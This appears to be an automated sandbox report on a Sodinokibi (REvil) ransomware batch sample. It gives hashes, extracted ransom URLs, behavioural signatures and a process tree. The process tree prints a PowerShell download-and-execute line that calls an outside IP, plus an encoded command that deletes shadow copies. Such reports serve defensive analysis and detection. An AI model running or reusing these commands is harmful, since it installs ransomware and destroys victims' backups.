Analysis
-
max time kernel
141s -
max time network
55s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
21-07-2020 03:10
Static task
static1
Behavioral task
behavioral1
Sample
c9af7ca3680a5a25e788062683cc93b4.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
c9af7ca3680a5a25e788062683cc93b4.bat
Resource
win10
General
-
Target
c9af7ca3680a5a25e788062683cc93b4.bat
-
Size
219B
-
MD5
dc0a4c0f80db22d5242cb4addeaa91f8
-
SHA1
ac411eca6ffc942efad96a63d86307d77c9f0c2f
-
SHA256
7de87ff14574bfdf6858a7cf58f8dad6ba484c372a9d5f4b4e3b6a4824d1a40a
-
SHA512
ab01868327fdc22ac891fe45261dfa8f737060c5c797fd42296bb71b546f82d84bba3114be6c37b35dd17621dd0f953ecd53191c9664864e9aae983493117e5c
Malware Config
Extracted
http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4
Extracted
C:\y5h61s8orj-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2D55285718AB8B9
http://decryptor.cc/D2D55285718AB8B9
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1388 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1504 powershell.exe 1504 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 828 wrote to memory of 1388 828 cmd.exe powershell.exe PID 828 wrote to memory of 1388 828 cmd.exe powershell.exe PID 828 wrote to memory of 1388 828 cmd.exe powershell.exe PID 828 wrote to memory of 1388 828 cmd.exe powershell.exe PID 1388 wrote to memory of 1504 1388 powershell.exe powershell.exe PID 1388 wrote to memory of 1504 1388 powershell.exe powershell.exe PID 1388 wrote to memory of 1504 1388 powershell.exe powershell.exe PID 1388 wrote to memory of 1504 1388 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeBackupPrivilege 740 vssvc.exe Token: SeRestorePrivilege 740 vssvc.exe Token: SeAuditPrivilege 740 vssvc.exe Token: SeTakeOwnershipPrivilege 1388 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1388 powershell.exe -
Drops file in Program Files directory 20 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\InvokeApprove.3gp2 powershell.exe File opened for modification \??\c:\program files\RegisterSkip.wmv powershell.exe File opened for modification \??\c:\program files\ShowConnect.vsx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\y5h61s8orj-readme.txt powershell.exe File created \??\c:\program files\y5h61s8orj-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\y5h61s8orj-readme.txt powershell.exe File opened for modification \??\c:\program files\UseCopy.crw powershell.exe File opened for modification \??\c:\program files\UseSet.3g2 powershell.exe File opened for modification \??\c:\program files\SetEnter.vsx powershell.exe File opened for modification \??\c:\program files\UninstallGrant.wmv powershell.exe File created \??\c:\program files (x86)\y5h61s8orj-readme.txt powershell.exe File opened for modification \??\c:\program files\BlockExpand.vdw powershell.exe File opened for modification \??\c:\program files\DisableComplete.wvx powershell.exe File opened for modification \??\c:\program files\EnterRequest.jpg powershell.exe File opened for modification \??\c:\program files\JoinExport.css powershell.exe File opened for modification \??\c:\program files\SelectCompress.search-ms powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.au powershell.exe File opened for modification \??\c:\program files\GetExport.docx powershell.exe File opened for modification \??\c:\program files\RestartReset.xla powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\y5h61s8orj-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g9in2e3.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\c9af7ca3680a5a25e788062683cc93b4.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4');Invoke-NZFRVEJKWUXV;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:740